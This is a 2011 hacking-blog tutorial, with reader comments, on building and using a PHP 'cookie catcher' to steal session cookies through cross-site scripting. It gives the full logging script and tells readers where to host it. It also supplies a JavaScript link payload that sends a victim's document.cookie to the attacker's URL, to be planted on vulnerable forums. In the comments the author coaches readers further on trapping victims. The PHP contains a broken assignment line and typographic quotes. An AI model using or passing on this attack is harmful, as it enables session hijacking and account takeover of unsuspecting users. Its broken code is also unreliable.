Dear Readers: HWS has recently started a new project for the students of engineering ====> The Engineering Projects


Write at HWS !!!

Guest Posting

Saturday, November 19, 2011

What is Cookie Catcher and How to Get Cookies Using it


Hello guys , hope you all are enjoying good health. the day before yesterday I have completed my tutorial on XSS in which we checked Hack Websites using XSS Attack and then Hack Website using XSS Attack - Non Persistent  Method In those tutorials I have told that we have to use cookie catcher tool to get the cookies in our online free php hosting account . After that I got a lot of questions about Cookie Catcher like what is it etc.
So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it.Hope yous guys like and If you have any problem in it do let me know in comments.

What is Cookie ?

  • First of all we will see what is cookie.In simple words a cookie is a special thing which our web browser used to store our information such as user username , passwords, etc.
  • Like have you guys ever noticed when we log in to some account like Facebook and click on any page to open it in new tab then why don't we have to log in our username and password again.Even if we close our Facebook account and again open it still there is no need to log in your details again unless you log out your account.
  • This thing is done by cookie of our browser.It actually for our ease but think what happens if this cookie got steal,then someone can easily log in our account without even knowing the password.

What is a cookie catcher?

  • A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
  • Hacker usually sends you a code or link and this link is connected to the cookie catcher.
  • When someone clicks on that link,the cookie catcher works and captures all the cookies of the innocent victim and sends them to hacker.

Is making a cookie catcher hard ?

  • Now the question arises,is it difficult to make a cookie catcher as it looks like we have to do some php programming etc.
  • The answer is no , if you you basic knowledge of php,you can make cookie catcher very easily. 
  • In fact the hard part is to get someone to click on a link which contains your cookie catcher.

How to Make a Cookie Catcher ?

  • Copy the below code in a notepad :
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>
  • Save this notepad as CookieCatcher.php
  • Hurrah !!! You have created a cookie catcher.

 How to Use Cookie Catcher ?

  • Now the question arises how can we use a cookie catcher.
  • First of all create a free account on 0fees.net
  • After creating account open cpanel.0fees.net and log in to your account.
  • Now under File Management , click on Online File Manager .
  • Now open htdocs and upload the CookieCatcher.php file in it.
  • Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.
<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>
  • Make sure to change user username .
  • After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.
NOTE : This tutorial is only for Educational purposes and HWS team is not responsible for any kind of mis use of it .

About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.
In 61 people's circles

Subscribe To Get FREE Tutorials!


Respected Readers:
As a 21 year old student, the only income I rely on is my pocket money. Bearing the running costs of HWS Blog has become really difficult. We educate thousands of bloggers a week with our tutorials. To help us go forward with the same spirit, a small contribution from your side will highly be appreciated.

13 comments:

I'm a blogger and I can get people to click it. But of course, I'm not doing that because I'm not a hacker. I'll use this knowledge to protect my self. Most victims of this cookie catcher are non tech savvy guys. Thanks foe the great post. I hope, this tutorial will not get into wrong hands.

@Edward .... ya man I have already mention that this tutorial is only for educational purposes so that other bloggers remain aware of such tricks .... as they seriously may cause you to loss your blog ....

"Now upload the below code in any site which is vulnerable to XSS like make a post in some forum." i didnt understand this step can u please explain more?

first find some XSS vulnerable forum which allows you to post php ..... and in that foum create a new thread and post this code there .... it appears like a link and whoever clicks on it ..... got trapped

Check this topic on XSS ===> http://www.hackwithstyle.com/2011/11/hack-websites-using-xss-attack.html

didnt undrstand this step :(
is it compulsory?
Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.

what if we didnt did this step and jst snd following link to victim?

will it work or not when victim will click?
reply full msg plx

yups the clicking is just to enter the link of the cookie catcher in the url ..... so if u can compel the victim to enter the link in the url bar then its fine ..... both works in the same way ....

So that code You gave Us wont really get us a persons cookie file? Or will it give us their cookie file? Or is it just to show us how its done as an example?

Confused? Feel free to ask

Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Note:-
Please do not spam Spam comments will be deleted immediately upon my review.

Regards,
XEO Hacker

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Recent Posts

Join Me On Facebook

700+ Followers

Followers


meet women in Ukraine contatore visite website counter
DMCA.com

Recent Comments

Follow Me On Twitter

1112+ Followers